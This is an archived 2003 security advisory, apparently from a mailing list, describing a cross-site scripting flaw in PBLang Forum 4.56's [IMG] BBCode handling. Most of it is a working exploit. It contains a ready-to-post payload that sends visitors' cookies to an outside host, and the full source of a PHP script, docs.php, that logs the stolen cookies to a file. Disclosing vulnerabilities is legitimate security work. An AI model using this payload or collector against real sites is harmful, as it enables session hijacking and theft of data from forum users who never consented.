('binary' encoding is not supported, stored as-is) PBLang is a PHP-base forum. A security hole has just found in this product allows an attacker to steals cookies or does many things… |--------------------------------------------| Vulnerable systems: PBLang Forum Version: 4.56 (4.5 RC 2) Website: http://pblang.drmartinus.de/ Problem: Cross Site Scripting (XSS) |--------------------------------------------| When a you inserts [IMG]url[/IMG], PBLang’ll changes that text to < img src=“url” >. If someone inserts javascript:‘anyscript’() instead of the url, the JavaScript code is executed by Internet Explorer or some other web browsers. EXPLOIT: Inserting a new topic (or reply) with the following text will send visitor's cookies to your host. The output is saved to http://your- host/cookies.txt . [IMG]javascript:window.open("http://localhost/docs.php?docs="+escape (document.cookie), "subwindows", "height=100,width=486")[/IMG] * Code of docs.php file: *----------docs.php--------- <?php define ("LINE", "\r\n"); define ("HTML_LINE", "<br>"); function getvars($arr, $title) { $res = ""; $len = count($arr); if ($len>0) { if (strlen($title)>0) { print("[--------$title--------]" . HTML_LINE); $res .= "[--------$title--------]" . LINE; } foreach ($arr as $key => $value) { print("[$key]" . HTML_LINE); print($arr[$key] . HTML_LINE); $res .= "[$key]" . LINE . $arr[$key] . LINE; } } return $res; } // get current date $now = date("Y-m-d H:i:s"); // init $myData = "[-----$now-----]" . LINE; // get $myData .= getvars($HTTP_GET_VARS, ""); // file $file = $REMOTE_ADDR . "cookies.txt"; $mode = "r+"; if (!file_exists($file)) $mode = "w+"; $fp = fopen ($file, $mode); fseek($fp, 0, SEEK_END); fwrite($fp, $myData); fclose($fp); ?> ----------docs.php---------*
This archive was generated by hypermail 2b30 : Mon Jul 28 2003 - 15:22:42 PDT